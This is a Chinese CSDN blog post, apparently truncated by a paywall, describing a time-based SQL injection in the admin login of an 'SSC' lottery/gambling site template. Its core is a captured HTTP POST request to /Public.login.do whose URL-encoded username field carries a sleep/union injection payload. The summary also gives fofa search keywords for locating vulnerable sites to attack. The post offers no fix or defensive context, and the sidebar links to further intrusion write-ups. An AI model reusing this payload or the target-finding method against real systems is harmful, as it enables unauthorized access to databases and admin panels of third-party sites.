某SSC模板通杀漏洞

已于 2022-05-02 06:27:45 修改
阅读量427 收藏 2
点赞数
分类专栏: web漏洞 文章标签: 安全
于 2021-07-27 13:38:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuguojiuai/article/details/119141876
版权
本文详细介绍了SSC模板中的一个通杀漏洞,重点讨论了漏洞的位置——后台登录处的延时注入问题,以及如何利用这个漏洞。通过fofa搜索引擎,可以使用特定关键词‘娱乐’、‘后台’和‘admin_think_template’来定位受此漏洞影响的系统。
摘要由CSDN通过智能技术生成

目录

0x1漏洞位置

0x2漏洞利用

0x3 漏洞关键词

0x1漏洞位置

该漏洞位置位于ssc后台,为登陆处延时注入。

0x2漏洞利用

在登陆过程中抓包获取相关http请求包:

POST /Public.login.do HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Length: 223
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=pcsn8b770h6ibi5nh50vkgs0k5; admin_think_template=admin
Origin: http://xxx
Referer: http://xxxx/Public.login.do
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

do=%C2%A0%E7%99%BB%C2%A0%C2%A0%C2%A0%C2%A0%E5%BD%95%C2%A0&info%5Bname%5D=admin%27and%28select%2Afrom%28select%2Bsleep%280%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27&info%5Bpass%5D=j
了解本专栏 订阅专栏 解锁全文 超级会员免费看
小韩韩啊
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Goby漏洞更新|H2 Database 数据库 login.do 文件远程代码执行漏洞 (CVE-2021-42392)
m0_46699477的博客
04-07 376
H2 database是一款Java内存数据库,多用于单元测试。H2-Database Web管理页面存在未授权远程代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
Web漏洞挖掘(一)登录认证模块的暴力破解实例
wuqi5700的博客
07-26 4367
Web漏洞挖掘(一)登录认证模块的暴力破解实例暴力破解的定义暴力破解的分类暴力破解的威胁涉及的基础知识模块相关硬件(高速GPU推荐)基于Burp Suite的暴力破解实例 暴力破解的定义 暴力破解测试是指针对应用系统用户登录账号与密码进行的枚举测试,针对账号或密码进行逐一对比,直到找到正确的账号与密码。 暴力破解的分类 已知账号的情况 :加载密码字典针对密码进行枚举测试; 未知账号的情况 :加载账号字典,配合着密码字典进行枚举测试; 未知账号和密码的情况:利用两个账号字典与密码字典进行枚举测试; 暴力破
SSC成功率较高的漏洞利用
xxx9686的博客
09-26 818
主要是xss,除去本身的运气意外,除非你有bc、时时彩的0day,留着自己日站很香,不过某个表哥非要把这些姿势分享出来那就一发额。在线客服,大部分网站会选用第三方客服,但是部分网站也会任性一下自己网站上带一个客服功能,客服位置也极有可能存在xss。注意:很多较大的平台充值与开奖后台是分离的,所以并不是说xss打下充值后台就一定是网站管理后台及开奖后台。需要注意的是,客服后台也基本上都是独立的后台与开奖后台、充值后台基本不会在同一后台中。
高危漏洞(登录接口带有vcode造成CSFF攻击)
meimeib的博客
07-16 190
测试软件 appscan 测试结果 来源 POST /web-api/api/login/checkLogin.do?vcode=3564 解决方案 把vcode放入body里
实现登录认证功能
weixin_61321344的博客
10-03 275
实现登录功能、会话技术、Cookie、Session、JWT令牌、过滤器Filter、拦截器Interceptor、全局异常处理
EtherCAT SSC V5.12
03-29
在这个压缩包中,我们主要关注的是"EtherCAT SSC V5.12",这是一个用于构建 EtherCAT 从站设备的软件协议栈,版本号为5.12,同时配合使用的工具是"SSC Tool"的1.4.2版。 "SSC简介与使用.docx"文档可能包含了关于SSC...
Beckhoff EtherCAT SSC 5.12 XML生成工具
04-01
2. XML配置模板和例子,用于快速创建新的从站配置。 3. 快速开发说明书PDF,详细介绍如何使用XML生成工具。 4. 可能还有其他开发工具、调试助手或者示例项目,帮助开发者进行实际操作。 总之,Beckhoff的EtherCAT ...
Ethercat SSC Tool 5.12及文档
10-22
EtherCAT SSC(Slave Stack Code)工具则是针对该协议的一个重要软件,它为开发者提供了生成EtherCAT从站代码的能力。在本文中,我们将深入探讨EtherCAT SSC Tool 5.12及其相关知识点。 1. EtherCAT协议详解: ...
SSC配置工具5.12版学习包
01-12
SSC配置工具5.12版是一个专门用于配置和管理EtherCAT从站栈代码的软件,适用于自动化控制、工业物联网等领域的系统开发。这个学习包是针对SSC Tool 5.12版本的一个资料集合,包含了相关的学习文章和实测案例,旨在...
SSC-V5i12.7z
05-29
SSC-V5i12.7z 是一个压缩包文件,根据其命名,我们可以推测它可能包含的是关于SSC(可能是“Smart Storage Controller”或类似的智能存储控制器)V5i系列的一个版本12的软件、驱动程序或者相关文档。7z格式是一种...
彩票选号器源码
12-16
C#编写的彩票选号器源码,提供二维码和条形码https://blog.csdn.net/QianFang900Mi/article/details/85029702
Beckhoff EtherCAT SSC 5.13 XML生成工具
08-30
在"Beckhoff EtherCAT SSC 5.13 XML 生成工具"中,我们看到的是一个专门用于处理和生成 EtherCAT SSC 相关XML配置文件的工具,其在5.12版本基础上进行了优化。 XML(eXtensible Markup Language)文件在自动化工程...
SSC_V5.12.txt
09-17
### EtherCAT从站协议及其工具SSC_V5.12简介 #### 一、EtherCAT技术概述 EtherCAT(以太网控制自动化技术)是一种开放式的以太网现场总线技术,由德国倍福自动化公司(Beckhoff Automation)于2003年推出。它以其...
SSC_V5i11.zip
10-11
"SlaveFiles.zip" 是另一个压缩包,可能包含了示例或者模板文件,用于指导开发者创建自己的EtherCAT从站设备文件。 总的来说,这个压缩包提供了全面的资源来支持 EtherCAT 从站的开发,包括代码生成工具、调试教程...
ssc工具生成倍福协议教程
05-24
这是一使用dave生成自动生成代码后,使用ssc去自动生成通讯协议
Spring 向页面传值以及接受页面传过来的参数的方式
weixin_30757793的博客
09-12 336
一、从页面接收参数 Spring MVC接收请求提交的参数值的几种方法: 使用HttpServletRequest获取。 @RequestMapping("/login.do") public String login(HttpServletRequest request){ String name = request.getParameter("name...
后端获取验证码,以及前端展示
gradonisis的博客
03-29 2327
首先先引入hutool工具包 可以百度下载 后端代码 @RequestMapping("/getVerification") @ILogInterceptor.LogMsg("获取验证码") @ResponseBody public void getVerification(HttpServletResponse response, HttpSession session) throws IOException{ LineCaptcha lineCaptcha =
login.do不是文件
12-04 4850
login.do不是文件,是一种url访问的方式,跟.jsp .asp .php .aspx .html .htm 不一样,login.do之后,服务器所返回的页面有可能是.jsp .html等等。 如果是java的struts的话,一般都会返回.jsp或.html的内容,貌似php也有这种login.do的方式。。
海翔ERP getylist_login.do接口存在sql注入漏洞
最新发布
nnn2188185的博客
03-09 122
海翔ERP getylist_login.do接口存在sql注入漏洞 附POC软件
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小韩韩啊

你的鼓励是对我最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值